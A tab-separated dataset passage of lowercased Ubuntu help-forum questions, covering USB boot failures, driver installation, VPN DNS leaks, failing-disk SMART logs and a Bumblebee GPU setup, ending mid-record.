424562	ubuntu 13.10 64 bit live usb created with unetbootin either not recognised or `` disk error '' on dell d630 bios a17	i know , i know , this question has been asked so many times but i have searched and searched and tried and tried but i ca n't get it to work . i 'm running windows xp on my dell d630 . i downloaded the 64 bit ubuntu 13.10 iso from the download page and `` burnt '' it to a fat32 formatted 2gb usb drive with unetbootin . i set up my bios so that usb devices are first in the boot sequence and even pressed f12 at the splash screen to make absolutely sure it was trying to boot from the usb drive . i removed all other usb devices , even my wireless usb mouse , but i get the dreaded `` disk error '' message . i have followed all the answers to similar questions on setting up the bios correctly , so enabling usb devices in the post menu , enabling usb emulation etc . i have read about the difference between usb-hdd and usb-zip but i ca n't find any option relating to this in the bios so if this is the issue then i 'd like to know how else to fix it . no worries , i tried again with another usb flash drive i had spare , this time 1gb , i did everything specified above except this time there is no disk error but instead the flash drive appears to be unrecognised . this is only my assumption : when i select usb device from the boot menu , the screen goes black with a blinking cursor ( `` _ '' ) for barely a second then the laptop boots as normal . i even tried removing the hdd but then i am informed that there are no bookable devices . i can boot from a 32 bit ubuntu 12.10 dvd if it 's any help . the laptop is a dell d630 with an intel t7100 processor , dt781 p/n motherboard ( intel graphics version ) , 1gb memory in each slot ( so 2gb overall ) and bios version a17 . help would be much appreciated
424563	installatoin of rt5370 wireless lan driver	could someone help me get the source code to rt5370 driver for installing wifi dongle . my hardware is came with 2870 drivers . the details are : uname -a 3.11.0-17-generic # 31-ubuntu smp mon feb 3 21:53:31 utc 2014 i686 i686 i686 gnu/linux lsusb bus 002 device 002 : id 148f:5370 ralink technology , corp. rt5370 wireless adapter thanks
424565	call a command as if it were in called in another directory	i 'm using a command line program whose documentation states : '' you can run xxx on input located in another directory , but its output will always be put in the current working directory '' . i 'd like to have the output written to another directory though . i could ( either with cd , or pushd + popd ) change to the output directory run the command so the output is put there then change back or run the command in my current location move the output to the output folder ... but both seem clunky , and prone to errors if the script were to be edited by someone who is n't aware of this requirement . the only other solution i can think of is to join the commands with semicolons . is there another way ? this is in bash by the way .
424569	ive tried all solutions on internet i found but none of them fix my dns leak issue	im using vpnbook and on every server ive a dnsleak according to dnsleak and dnsleaktest what intrigues me is that the vpn 's dns never appears there but my normal dns always does.so i do n't even know what the vpn 's dns is and no search results show it so if you know this vpn 's dns please write me so i change to it . my ip address changes to the vpn 's according to several ip check sites . ive thought to change my primary dns so i installed namebench to find the fastest dns servers and made it the default in etc/dhcp/dhclient.confnow tests show the new fastest dns instead of isp 's dns it used to show . this shows after entering into terminal openvpn -- config /home/xxx/vpnbook-uk1-udp25000.ovpn openvpn 2.3.2 x86_64-pc-linux-gnu [ ssl ( openssl ) ] [ lzo ] [ epoll ] [ pkcs11 ] [ eurephia ] [ mh ] [ ipv6 ] built on feb 4 2014 sat feb 22 11:16:04 2014 warning : file '/home/xxx/pass.txt ' is group or others accessible sat feb 22 11:16:04 2014 warning : no server certificate verification method has been enabled . see http : //openvpn.net/howto.html # mitm for more info . sat feb 22 11:16:04 2014 socket buffers : r= [ 212992- > 131072 ] s= [ 212992- > 131072 ] sat feb 22 11:16:04 2014 udpv4 link local : [ undef ] sat feb 22 11:16:04 2014 udpv4 link remote : [ af_inet ] 46.23.68.180:25000 sat feb 22 11:16:04 2014 tls : initial packet from [ af_inet ] 46.23.68.180:25000 , sid=ecfe718a f93931d2 sat feb 22 11:16:04 2014 warning : this configuration may cache passwords in memory -- use the auth-nocache option to prevent this sat feb 22 11:16:05 2014 verify ok : depth=1 , c=ch , st=zurich , l=zurich , o=vpnbook.com , ou=it , cn=vpnbook.com , name=vpnbook.com , emailaddress=admin @ vpnbook.com sat feb 22 11:16:05 2014 verify ok : depth=0 , c=ch , st=zurich , l=zurich , o=vpnbook.com , ou=it , cn=vpnbook.com , name=vpnbook.com , emailaddress=admin @ vpnbook.com sat feb 22 11:16:05 2014 data channel encrypt : cipher 'aes-128-cbc ' initialized with 128 bit key sat feb 22 11:16:05 2014 data channel encrypt : using 160 bit message hash 'sha1 ' for hmac authentication sat feb 22 11:16:05 2014 data channel decrypt : cipher 'aes-128-cbc ' initialized with 128 bit key sat feb 22 11:16:05 2014 data channel decrypt : using 160 bit message hash 'sha1 ' for hmac authentication sat feb 22 11:16:05 2014 control channel : tlsv1 , cipher tlsv1/sslv3 dhe-rsa-aes256-sha , 1024 bit rsa sat feb 22 11:16:05 2014 [ vpnbook.com ] peer connection initiated with [ af_inet ] 46.23.68.180:25000 sat feb 22 11:16:07 2014 sent control [ vpnbook.com ] : 'push_request ' ( status=1 ) sat feb 22 11:16:07 2014 push : received control message : 'push_reply , redirect-gateway def1 , dhcp-option dns 83.170.64.2 , dhcp-option dns 83.170.69.2 , route 10.10.0.1 , topology net30 , ping 5 , ping-restart 30 , ifconfig 10.10.0.30 10.10.0.29' sat feb 22 11:16:07 2014 options import : timers and/or timeouts modified sat feb 22 11:16:07 2014 options import : -- ifconfig/up options modified sat feb 22 11:16:07 2014 options import : route options modified sat feb 22 11:16:07 2014 options import : -- ip-win32 and/or -- dhcp-option options modified sat feb 22 11:16:07 2014 route_gateway 172.16.1.1/255.255.255.0 iface=eth0 hwaddr=00:11:09:8e:39 : b3 sat feb 22 11:16:07 2014 tun/tap device tun2 opened sat feb 22 11:16:07 2014 tun/tap tx queue length set to 100 sat feb 22 11:16:07 2014 do_ifconfig , tt- > ipv6=0 , tt- > did_ifconfig_ipv6_setup=0 sat feb 22 11:16:07 2014 /sbin/ip link set dev tun2 up mtu 1500 sat feb 22 11:16:07 2014 /sbin/ip addr add dev tun2 local 10.10.0.30 peer 10.10.0.29 sat feb 22 11:16:10 2014 /sbin/ip route add 46.23.68.180/32 via 172.16.1.1 sat feb 22 11:16:10 2014 /sbin/ip route add 0.0.0.0/1 via 10.10.0.29 sat feb 22 11:16:10 2014 /sbin/ip route add 128.0.0.0/1 via 10.10.0.29 sat feb 22 11:16:10 2014 /sbin/ip route add 10.10.0.1/32 via 10.10.0.29 sat feb 22 11:16:10 2014 initialization sequence completed im also worried about the mitm attack warning . ive all updates installed on l14.04 . i believe this isnt a lubuntu specific issue . update . after blocking outgoing port 53 on udp and tcp like user251087 suggested i cant access any google website.also dnsleak test loads forever
424572	how can i remove shift delete shortcut ?	i accidentally permanent delete a folder because my computer was lagging ... it was a terrible mistake . i deleted it at my dorm where i have no other secondary computers to do a recovery on because the file is located in my laptop , and i need to use the laptop so recovering it is a lost cause . i want to force myself to do the long way which is delete it then , permanent delete it at the trash folder so that i could double check if i deleted unnecessary files . i always forget to not use shift delete . if there is no way to remove the shortcut , is there a way to force me to think before deleting , because after pressing shift delete , enter comes next instinctively ...
424576	monitor displays `` signal out of limits '' message after installing catalyst/fglrx	i installed ubuntu 12.04.4 into my desktop pc ( ati radeon hd 5570 graphics card , monitor full hd lg w2240 ) . i tried to install ati catalyst driver suggested by ubuntu system itself . when i tried to reboot , it keeps on giving me on a black screen the message signal out of limits 74.9 khz / 60 hz . the same message is given when i try to boot from the safe mode . i tried to use the instructions suggested by this page but i could n't achieve anything since it keeps on offering a login prompt where nothing is actually accepted . emil athanasiou
424580	i/o error , dev sda , sector xxxxxxxxxx	heading my machine has crashed couple of times this week . ran smartmontools test and got this result : === start of information section === model family : fujitsu mja bh device model : fujitsu mja2250bh g2 serial number : k94pt972b7rs lu wwn device id : 5 00000e 043bcbddd firmware version : 8919 user capacity : 250,059,350,016 bytes [ 250 gb ] sector size : 512 bytes logical/physical device is : in smartctl database [ for details use : -p show ] ata version is : 8 ata standard is : ata-8-acs revision 3f local time is : mon feb 10 09:24:22 2014 ist smart support is : available - device has smart capability . smart support is : enabled === start of read smart data section === smart overall-health self-assessment test result : passed general smart values : offline data collection status : ( 0x00 ) offline data collection activity was never started . auto offline data collection : disabled . self-test execution status : ( 118 ) the previous self-test completed having the read element of the test failed . total time to complete offline data collection : ( 783 ) seconds . offline data collection capabilities : ( 0x51 ) smart execute offline immediate . no auto offline data collection support . suspend offline collection upon new command . no offline surface scan supported . self-test supported . no conveyance self-test supported . selective self-test supported . smart capabilities : ( 0x0003 ) saves smart data before entering power-saving mode . supports smart auto save timer . error logging capability : ( 0x01 ) error logging supported . general purpose logging supported . short self-test routine recommended polling time : ( 2 ) minutes . extended self-test routine recommended polling time : ( 111 ) minutes . sct capabilities : ( 0x003f ) sct status supported . sct error recovery control supported . sct feature control supported . sct data table supported . smart attributes data structure revision number : 16 vendor specific smart attributes with thresholds : id # attribute_name flag value worst thresh type updated when_failed raw_value 1 raw_read_error_rate 0x002f 100 078 046 pre-fail always - 41112 2 throughput_performance 0x0025 253 253 030 pre-fail offline - 33619968 3 spin_up_time 0x0023 100 100 025 pre-fail always - 0 4 start_stop_count 0x0032 099 099 000 old_age always - 4448 5 reallocated_sector_ct 0x0033 253 253 024 pre-fail always - 0 7 seek_error_rate 0x002f 100 100 047 pre-fail always - 2140 8 seek_time_performance 0x0025 253 253 019 pre-fail offline - 0 9 power_on_hours 0x0032 089 089 000 old_age always - 5655 10 spin_retry_count 0x0033 253 253 020 pre-fail always - 0 11 calibration_retry_count 0x0032 253 253 000 old_age always - 0 12 power_cycle_count 0x0032 100 100 000 old_age always - 4319 180 unused_rsvd_blk_cnt_tot 0x002f 100 100 098 pre-fail always - 0 182 erase_fail_count_total 0x0032 100 100 000 old_age always - 0 183 runtime_bad_block 0x0032 253 100 000 old_age always - 327680 184 end-to-end_error 0x0033 253 253 097 pre-fail always - 0 185 unknown_attribute 0x0030 100 100 000 old_age offline - 2 186 unknown_attribute 0x0032 253 253 000 old_age always - 1441792 187 reported_uncorrect 0x0032 100 026 000 old_age always - 281470684365183 188 command_timeout 0x0032 100 099 000 old_age always - 1 189 high_fly_writes 0x003a 253 100 000 old_age always - 0 190 airflow_temperature_cel 0x0022 067 050 045 old_age always - 33 ( min/max 23/33 ) 191 g-sense_error_rate 0x0032 253 098 000 old_age always - 16580617 192 power-off_retract_count 0x0032 096 096 000 old_age always - 71566404 193 load_cycle_count 0x0032 099 099 000 old_age always - 35363 195 hardware_ecc_recovered 0x003a 253 253 000 old_age always - 20430 196 reallocated_event_count 0x0032 253 253 000 old_age always - 0 197 current_pending_sector 0x0032 100 087 000 old_age always - 1 198 offline_uncorrectable 0x0030 253 253 000 old_age offline - 0 199 udma_crc_error_count 0x003e 253 253 000 old_age always - 0 smart error log version : 1 ata error count : 517 ( device log contains only the most recent five errors ) cr = command register [ hex ] fr = features register [ hex ] sc = sector count register [ hex ] sn = sector number register [ hex ] cl = cylinder low register [ hex ] ch = cylinder high register [ hex ] dh = device/head register [ hex ] dc = device command register [ hex ] er = error register [ hex ] st = status register [ hex ] powered_up_time is measured from power on , and printed as ddd+hh : mm : ss.sss where dd=days , hh=hours , mm=minutes , ss=sec , and sss=millisec . it `` wraps '' after 49.710 days . error 517 occurred at disk power-on lifetime : 5654 hours ( 235 days + 14 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 40 51 00 00 00 00 a0 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ec 00 00 00 00 00 a0 08 00:03:39.320 identify device c8 00 80 80 28 97 ec 08 00:03:30.939 read dma c8 00 80 20 2a 97 ec 08 00:03:27.409 read dma c8 00 90 c0 5b e2 e5 08 00:03:27.394 read dma ca 00 98 00 9b 98 ec 08 00:03:27.393 write dma error 516 occurred at disk power-on lifetime : 5654 hours ( 235 days + 14 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 40 51 00 00 00 00 a0 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ec 00 00 00 00 00 a0 08 00:03:23.216 identify device c8 00 40 40 28 97 ec 08 00:03:14.822 read dma ef 10 02 00 00 00 a0 08 00:03:14.821 set features [ reserved for serial ata ] ec 00 00 00 00 00 a0 08 00:03:14.819 identify device ef 03 45 00 00 00 a0 08 00:03:14.819 set features [ set transfer mode ] error 515 occurred at disk power-on lifetime : 5654 hours ( 235 days + 14 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 40 51 00 00 00 00 a0 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ec 00 00 00 00 00 a0 08 00:03:14.815 identify device c8 00 40 40 28 97 ec 08 00:03:06.445 read dma c8 00 08 18 2a 97 ec 08 00:03:04.772 read dma ef 10 02 00 00 00 a0 08 00:03:04.772 set features [ reserved for serial ata ] ec 00 00 00 00 00 a0 08 00:03:04.770 identify device error 514 occurred at disk power-on lifetime : 5654 hours ( 235 days + 14 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 40 51 03 1d 2a 97 ec error : unc 3 sectors at lba = 0x0c972a1d = 211233309 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- c8 00 08 18 2a 97 ec 08 00:03:00.416 read dma ef 10 02 00 00 00 a0 08 00:03:00.415 set features [ reserved for serial ata ] ec 00 00 00 00 00 a0 08 00:03:00.413 identify device ef 03 45 00 00 00 a0 08 00:03:00.413 set features [ set transfer mode ] ef 10 02 00 00 00 a0 08 00:03:00.413 set features [ reserved for serial ata ] error 513 occurred at disk power-on lifetime : 5654 hours ( 235 days + 14 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 40 51 03 1d 2a 97 ec error : unc 3 sectors at lba = 0x0c972a1d = 211233309 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- c8 00 08 18 2a 97 ec 08 00:02:56.010 read dma ea 00 00 00 00 00 a0 08 00:02:55.973 flush cache ext 35 00 08 20 44 d6 e0 08 00:02:55.973 write dma ext ea 00 00 00 00 00 a0 08 00:02:55.949 flush cache ext 35 00 38 e8 43 d6 e0 08 00:02:55.949 write dma ext smart self-test log structure revision number 1 num test_description status remaining lifetime ( hours ) lba_of_first_error # 1 extended offline completed : read failure 60 % 5618 201724230 # 2 short offline completed without error 00 % 5617 - # 3 short offline completed without error 00 % 5617 - # 4 extended offline completed without error 00 % 5600 - # 5 short offline completed : read failure 90 % 5595 239457889 # 6 short offline completed : read failure 90 % 5595 239457889 # 7 short captive completed without error 00 % 5305 - # 8 short captive completed without error 00 % 5301 - # 9 short captive completed without error 00 % 5301 - # 10 short captive completed without error 00 % 5301 - # 11 short captive completed : read failure 90 % 5301 214242167 # 12 extended offline completed : read failure 60 % 4819 176075039 # 13 short offline completed without error 00 % 4819 - # 14 short offline aborted by host 90 % 214 - # 15 short offline aborted by host 90 % 214 - # 16 short offline completed without error 00 % 214 - # 17 short offline completed without error 00 % 214 - # 18 short offline completed without error 00 % 4 - # 19 short offline completed without error 00 % 3 - # 20 short offline completed without error 00 % 2 - # 21 short offline completed without error 00 % 1 - 4 of 5 failed self-tests are outdated by newer successful extended offline self-test # 4 smart selective self-test log data structure revision number 1 span min_lba max_lba current_test_status 1 0 0 not_testing 2 0 0 not_testing 3 0 0 not_testing 4 0 0 not_testing 5 0 0 not_testing selective self-test flags ( 0x0 ) : after scanning selected spans , do not read-scan remainder of disk . if selective self-test is pending on power-up , resume after 0 minute delay . can someone please let me know what this means ? should i replace my hard drive immediately ? update : as landroni suggested , i ran short and extended self-tests using gsmartcontrol . short self-test ran without throwing any errors . extended test got aborted at 40 % because of errors . here is the the paste from self-test logs : smartctl 5.41 2011-06-09 r3365 [ x86_64-linux-3.2.0-51-generic ] ( local build ) copyright ( c ) 2002-11 by bruce allen , http : //smartmontools.sourceforge.net === start of information section === model family : fujitsu mja bh device model : fujitsu mja2250bh g2 serial number : k94pt972b7rs lu wwn device id : 5 00000e 043bcbddd firmware version : 8919 user capacity : 250,059,350,016 bytes [ 250 gb ] sector size : 512 bytes logical/physical device is : in smartctl database [ for details use : -p show ] ata version is : 8 ata standard is : ata-8-acs revision 3f local time is : sun feb 23 21:13:50 2014 ist smart support is : available - device has smart capability . smart support is : enabled === start of read smart data section === smart overall-health self-assessment test result : passed general smart values : offline data collection status : ( 0x00 ) offline data collection activity was never started . auto offline data collection : disabled . self-test execution status : ( 118 ) the previous self-test completed having the read element of the test failed . total time to complete offline data collection : ( 783 ) seconds . offline data collection capabilities : ( 0x51 ) smart execute offline immediate . no auto offline data collection support . suspend offline collection upon new command . no offline surface scan supported . self-test supported . no conveyance self-test supported . selective self-test supported . smart capabilities : ( 0x0003 ) saves smart data before entering power-saving mode . supports smart auto save timer . error logging capability : ( 0x01 ) error logging supported . general purpose logging supported . short self-test routine recommended polling time : ( 2 ) minutes . extended self-test routine recommended polling time : ( 111 ) minutes . sct capabilities : ( 0x003f ) sct status supported . sct error recovery control supported . sct feature control supported . sct data table supported . smart attributes data structure revision number : 16 vendor specific smart attributes with thresholds : id # attribute_name flag value worst thresh type updated when_failed raw_value 1 raw_read_error_rate 0x002f 100 078 046 pre-fail always - 124861 2 throughput_performance 0x0025 253 253 030 pre-fail offline - 33619968 3 spin_up_time 0x0023 100 100 025 pre-fail always - 0 4 start_stop_count 0x0032 099 099 000 old_age always - 4489 5 reallocated_sector_ct 0x0033 253 253 024 pre-fail always - 0 7 seek_error_rate 0x002f 100 100 047 pre-fail always - 1157 8 seek_time_performance 0x0025 253 253 019 pre-fail offline - 0 9 power_on_hours 0x0032 089 089 000 old_age always - 5693 10 spin_retry_count 0x0033 253 253 020 pre-fail always - 0 11 calibration_retry_count 0x0032 253 253 000 old_age always - 0 12 power_cycle_count 0x0032 100 100 000 old_age always - 4342 180 unused_rsvd_blk_cnt_tot 0x002f 100 100 098 pre-fail always - 0 182 erase_fail_count_total 0x0032 100 100 000 old_age always - 0 183 runtime_bad_block 0x0032 253 100 000 old_age always - 327680 184 end-to-end_error 0x0033 253 253 097 pre-fail always - 0 185 unknown_attribute 0x0030 100 100 000 old_age offline - 2 186 unknown_attribute 0x0032 253 253 000 old_age always - 1441792 187 reported_uncorrect 0x0032 100 026 000 old_age always - 281470684365183 188 command_timeout 0x0032 100 099 000 old_age always - 1 189 high_fly_writes 0x003a 100 100 000 old_age always - 0 190 airflow_temperature_cel 0x0022 059 050 045 old_age always - 41 ( min/max 37/42 ) 191 g-sense_error_rate 0x0032 253 098 000 old_age always - 16580617 192 power-off_retract_count 0x0032 096 096 000 old_age always - 71566404 193 load_cycle_count 0x0032 099 099 000 old_age always - 35590 195 hardware_ecc_recovered 0x003a 253 253 000 old_age always - 68959 196 reallocated_event_count 0x0032 253 253 000 old_age always - 0 197 current_pending_sector 0x0032 100 087 000 old_age always - 1 198 offline_uncorrectable 0x0030 253 253 000 old_age offline - 0 199 udma_crc_error_count 0x003e 253 253 000 old_age always - 0 smart error log version : 1 ata error count : 519 ( device log contains only the most recent five errors ) cr = command register [ hex ] fr = features register [ hex ] sc = sector count register [ hex ] sn = sector number register [ hex ] cl = cylinder low register [ hex ] ch = cylinder high register [ hex ] dh = device/head register [ hex ] dc = device command register [ hex ] er = error register [ hex ] st = status register [ hex ] powered_up_time is measured from power on , and printed as ddd+hh : mm : ss.sss where dd=days , hh=hours , mm=minutes , ss=sec , and sss=millisec . it `` wraps '' after 49.710 days . error 519 occurred at disk power-on lifetime : 5685 hours ( 236 days + 21 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 40 51 03 10 00 00 00 error : commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 00 00 01 01 00 00 00 ff 00:01:40.036 nop [ abort queued commands ] 00 00 01 01 00 00 00 ff 00:01:30.023 nop [ abort queued commands ] 00 00 01 01 00 00 00 ff 00:01:20.011 nop [ abort queued commands ] 2f 00 01 10 00 00 a0 08 00:01:15.009 read log ext 60 08 38 f0 68 47 40 08 00:01:08.725 read fpdma queued error 518 occurred at disk power-on lifetime : 5685 hours ( 236 days + 21 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 40 41 03 d8 5b e2 40 error : unc at lba = 0x00e25bd8 = 14834648 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 60 08 38 f0 68 47 40 08 00:01:08.725 read fpdma queued 60 08 30 40 09 84 40 08 00:01:08.568 read fpdma queued 61 08 28 70 09 9d 40 08 00:01:08.243 write fpdma queued 61 a0 20 00 55 d6 40 08 00:01:07.961 write fpdma queued 61 08 18 68 09 9d 40 08 00:01:07.594 write fpdma queued error 517 occurred at disk power-on lifetime : 5654 hours ( 235 days + 14 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 40 51 00 00 00 00 a0 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ec 00 00 00 00 00 a0 08 00:03:39.320 identify device c8 00 80 80 28 97 ec 08 00:03:30.939 read dma c8 00 80 20 2a 97 ec 08 00:03:27.409 read dma c8 00 90 c0 5b e2 e5 08 00:03:27.394 read dma ca 00 98 00 9b 98 ec 08 00:03:27.393 write dma error 516 occurred at disk power-on lifetime : 5654 hours ( 235 days + 14 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 40 51 00 00 00 00 a0 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ec 00 00 00 00 00 a0 08 00:03:23.216 identify device c8 00 40 40 28 97 ec 08 00:03:14.822 read dma ef 10 02 00 00 00 a0 08 00:03:14.821 set features [ reserved for serial ata ] ec 00 00 00 00 00 a0 08 00:03:14.819 identify device ef 03 45 00 00 00 a0 08 00:03:14.819 set features [ set transfer mode ] error 515 occurred at disk power-on lifetime : 5654 hours ( 235 days + 14 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 40 51 00 00 00 00 a0 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ec 00 00 00 00 00 a0 08 00:03:14.815 identify device c8 00 40 40 28 97 ec 08 00:03:06.445 read dma c8 00 08 18 2a 97 ec 08 00:03:04.772 read dma ef 10 02 00 00 00 a0 08 00:03:04.772 set features [ reserved for serial ata ] ec 00 00 00 00 00 a0 08 00:03:04.770 identify device smart self-test log structure revision number 1 num test_description status remaining lifetime ( hours ) lba_of_first_error # 1 extended offline completed : read failure 60 % 5692 201724258 # 2 extended offline aborted by host 90 % 5691 - # 3 short offline completed without error 00 % 5690 - # 4 extended offline completed : read failure 60 % 5618 201724230 # 5 short offline completed without error 00 % 5617 - # 6 short offline completed without error 00 % 5617 - # 7 extended offline completed without error 00 % 5600 - # 8 short offline completed : read failure 90 % 5595 239457889 # 9 short offline completed : read failure 90 % 5595 239457889 # 10 short captive completed without error 00 % 5305 - # 11 short captive completed without error 00 % 5301 - # 12 short captive completed without error 00 % 5301 - # 13 short captive completed without error 00 % 5301 - # 14 short captive completed : read failure 90 % 5301 214242167 # 15 extended offline completed : read failure 60 % 4819 176075039 # 16 short offline completed without error 00 % 4819 - # 17 short offline aborted by host 90 % 214 - # 18 short offline aborted by host 90 % 214 - # 19 short offline completed without error 00 % 214 - # 20 short offline completed without error 00 % 214 - # 21 short offline completed without error 00 % 4 - 4 of 6 failed self-tests are outdated by newer successful extended offline self-test # 7 smart selective self-test log data structure revision number 1 span min_lba max_lba current_test_status 1 0 0 not_testing 2 0 0 not_testing 3 0 0 not_testing 4 0 0 not_testing 5 0 0 not_testing selective self-test flags ( 0x0 ) : after scanning selected spans , do not read-scan remainder of disk . if selective self-test is pending on power-up , resume after 0 minute delay . update ran badblocks using sudo badblocks -v /dev/sda > bad-blocks-result result : pass completed , 25 bad blocks found . ( 25/0/0 errors ) what do i do now ? output file indicates the following block numbers : 105877868 105877869 105877870 105877871 105877872 105877873 105877880 105877881 105877882 105877883 105877892 105877893 105877894 105877900 105877901 105877902 105877903 105877908 105877909 105877910 105877911 105877916 105877917 105877918 105877919
424583	ubuntu on dell latitude c800	i try to download ubuntu to my dell latitude c800 , but i have n't got enough ram . does anybody knows where i can get more ram , or anything else to get ubuntu run on my dell latitude c800 . would be glad to get answers about this . thanks a lot !
424588	grub is blank.i thought lubuntu wont boot but pressing enter fixed it.how to fix grub ?	i reinstalled os because i thought it wont boot.this happens on first and every lubuntu 14.04 boot . i left grub to load os for several minutes many times in a row and it was still stuck at a blank screen.the screen received video signal but all was black . maybe sometimes grub loads os longer than 10 mins . after pressing enter for the first time while in grub it loaded splash screen in a minute what confuses me is that today i did n't press enter and it booted as if i did . the main issue now is that screen is blank when grub is active until the splash screen takes over.ive tried to fix it by uncommenting grub_gfxmode and changing it to grub_gfxmode=1360x768x32 sorry for my grammmar
424589	`` ^ '' key in lubunt 13.10	my problem is a very simple looking problem but yet it is completely annoying . the problem is that when i type `` x '' + `` ^ '' + `` 2 '' ( for example ) i get xâ˛ instead of x^2 . this causes too many problems when programming or writing mathematical equations . i know that i can simply write `` ^ '' + `` space '' to get `` ^ '' however there must be an easier way to fix this problem since there was no problem of this kind when i was using ubuntu . thank you in advance .
424593	no - error : could not load gpu driver ; can not access secondary gpu - error : could not load gpu driver	i 'm new to ubuntu ... so pls ppl i need help : ) my notebook specs : cpu : intel core i5 3230m ram : 4gb 1600mhz i have 2 gpus , 1st : intel hd 4000 2nd : nvidia gt 720m today i installed bumblebee and nvidia 331 driver . the install was successful so notebook started without black screen : ) the problem is that notebook wo n't start programs with nvidia . and it wo n't recognize gpu : ( here what i did : sudo apt-get install nvidia-331 bumblebee linux-headers-generic sudo gedit /etc/bumblebee/bumblebee.conf replaced matching keywords with these values : driver=nvidia kerneldriver=nvidia-331 librarypath=/usr/lib/nvidia-331 : /usr/lib32/nvidia-331 xorgmodulepath=/usr/lib/nvidia-331/xorg , /usr/lib/xorg/modules save and exit i then removed 304-driver sudo jockey-text -d kmod : nvidia_304 then reconfigure some stuff , by running this and pressing ok. sudo pam-auth-update -- force rebooted . then i installed virtualgl http : //sourceforge.net/projects/virtualgl/files/virtualgl/2.3.3/ sudo dpkg -i virtualgl_2.3.3_amd64.deb after running optirun , here is the output : nikola95o @ nikola95o-x550vc : ~ $ optirun -vvv glxgears [ 2454.183529 ] [ debug ] reading file : /etc/bumblebee/bumblebee.conf [ 2454.184219 ] [ debug ] optirun version 3.2.1 starting ... [ 2454.184240 ] [ debug ] active configuration : [ 2454.184248 ] [ debug ] bumblebeed config file : /etc/bumblebee/bumblebee.conf [ 2454.184255 ] [ debug ] x display : :8 [ 2454.184261 ] [ debug ] ld_library_path : [ 2454.184267 ] [ debug ] socket path : /var/run/bumblebee.socket [ 2454.184273 ] [ debug ] accel/display bridge : auto [ 2454.184279 ] [ debug ] vgl compression : proxy [ 2454.184285 ] [ debug ] vglrun extra options : [ 2454.184291 ] [ debug ] primus ld path : /usr/lib/x86_64-linux-gnu/primus : /usr/lib/i386-linux-gnu/primus [ 2454.184340 ] [ debug ] using auto-detected bridge virtualgl [ 2454.187518 ] [ info ] response : no - error : could not load gpu driver [ 2454.187546 ] [ error ] can not access secondary gpu - error : could not load gpu driver [ 2454.187555 ] [ debug ] socket closed . [ 2454.187582 ] [ error ] aborting because fallback start is disabled . [ 2454.187595 ] [ debug ] killing all remaining processes . with lspci -v | less : 00:02.0 vga compatible controller : intel corporation 3rd gen core process or graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : asustek computer inc. device 124d flags : bus master , fast devsel , latency 0 , irq 46 memory at f7400000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at d0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at f000 [ size=64 ] expansion rom at [ disabled ] capabilities : kernel driver in use : i915 01:00.0 3d controller : nvidia corporation gf117m [ geforce 610m/710m / gt 620m/625m/630m/720m ] ( rev a1 ) subsystem : asustek computer inc. geforce gt 720m flags : bus master , fast devsel , latency 0 , irq 16 memory at f6000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at f0000000 ( 64-bit , prefetchable ) [ size=32m ] i/o ports at e000 [ size=128 ] expansion rom at f7000000 [ disabled ] [ size=512k ] capabilities : and here is my bumblebee.conf file : # configuration file for bumblebee . values should not be put between quotes server options . any change made in this section will need a server restart to take effect . [ bumblebeed ] the secondary xorg server display number virtualdisplay=:8 should the unused xorg server be kept running ? set this to true if waiting for x to be ready is too long and do n't need power management at all . keepunusedxserver=false the name of the bumbleblee server group name ( gid name ) servergroup=bumblebee card power state at exit 